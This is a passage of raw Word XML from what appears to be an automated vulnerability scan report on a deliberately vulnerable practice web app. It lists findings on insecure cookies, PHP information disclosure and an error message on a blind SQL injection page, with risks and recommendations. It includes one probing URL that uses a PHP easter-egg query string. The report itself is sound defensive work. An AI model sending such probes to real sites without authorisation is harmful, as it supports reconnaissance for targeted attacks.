        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E27C442" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A0F172" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.9 Insecure cookie setting: missing Secure flag </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="74809C7B" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="375B513F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4548A585" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="0F02ABAC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78C3947F" wp14:editId="0224B411">
                  <wp:extent cx="1397000" cy="1397000"/>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49F801CE" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="050000F7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="6C31B4F5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A6A1DC4"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2321"/>
        <w:gridCol w:w="1854"/>
        <w:gridCol w:w="5675"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1FA377CA" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6404D18D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27E7F6E6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Cookie Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08F7A5E2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="00625065" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D374C0F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId77">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D6DC6D3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>PHPSESSID, security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67714B4A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Set-Cookie: PHPSESSID=0c91ce65c9d194f858f04aa98f3fee35</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Set-Cookie: security=low</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId78">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56B2E57E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281AF276" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">We found that a cookie has been set without the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag, which means the browser will send it over an unencrypted channel (plain HTTP) if such a request is made. The root cause for this usually revolves around misconfigurations in the code or server settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD45902" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696767C8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk exists that an attacker will intercept the clear-text communication between the browser and the server and he will steal the cookie of the user. If this is a session cookie, the attacker could gain unauthorized access to the victim's web session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F055D7D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE06B96" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Whenever a cookie contains sensitive information or is a session token, then it should always be passed using an encrypted channel. Ensure that the  flag is set for cookies containing such sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8C37E6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D496DA9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId79">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/06-Session_Management_Testing/02-Testing_for_Cookies_Attributes.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1500D705"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704A2830"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5C45A080" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="762B257D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="594E2693" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67F4BC56" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32EA15AC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId80">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-614</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="59BA81D5" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="262AACFF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E3B7313" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId81">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A6 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="69B9E235" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6313B1BA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05961540" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId82">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A5 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B2800AB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AE6BCC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066A5C7C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="396ABFB0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.10 Server Information disclosure </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2E70F414" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F489715" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ED8D9CC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="5028206E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="551CA141" wp14:editId="4663137B">
                  <wp:extent cx="1397000" cy="1397000"/>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6685FBF0" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E506E1F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="2E9D6059" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D1F1C93"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022610F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D980CF0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D3555B6"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83">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="07AB34A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966AD14" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Page Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="430A92B6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Welcome :: Damn Vulnerable Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="241850A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E101F2B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Page Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B88A46A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>5.79 KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7BF8962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3DAB77C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08BDFF52" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AA513D6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="79F6BF19" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0E116E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We noticed that the target application is revealing server and backend application information through certain files. This type of information disclosure is typically due to insufficient data protection measures, leading to unintended exposure of sensitive server details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BF594A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD14BCB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk is that an attacker could use these files to find information about the backend application, server software and their specific versions. This information could be further used to mount targeted attacks against the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B557167" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EC6145" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We recommend you to remove these scripts if they are not needed for business purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C80A3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BFCEB2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId84">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://projects.webappsec.org/w/page/13246936/Information%20Leakage</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66696891"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03D242C5"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74DD5DB6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B61038E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="789E2399" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34582D80" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35D6483D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId85">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-200</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2769F31D" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65C8A3CF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D41265F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId86">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A6 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4D8CB94D" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26A068E4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72E4C5FF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId87">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A5 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AADADF1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F6D0C3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="989898"/>
        </w:rPr>
        <w:t>✘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB3BD5B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="207410D8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.11 Error message containing sensitive information </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="539A62C8" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FB6FE92" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A50E12F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="1BDBA01E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61EF307F" wp14:editId="302457AC">
                  <wp:extent cx="1397000" cy="1397000"/>
                  <wp:effectExtent l="0" t="0" r="0"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3FF473E2" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64CC8239" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="14ACB04F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="200E6CE3"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2873"/>
        <w:gridCol w:w="6977"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1B6D7D7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473F463" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F737572"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89">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/sqli_blind/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
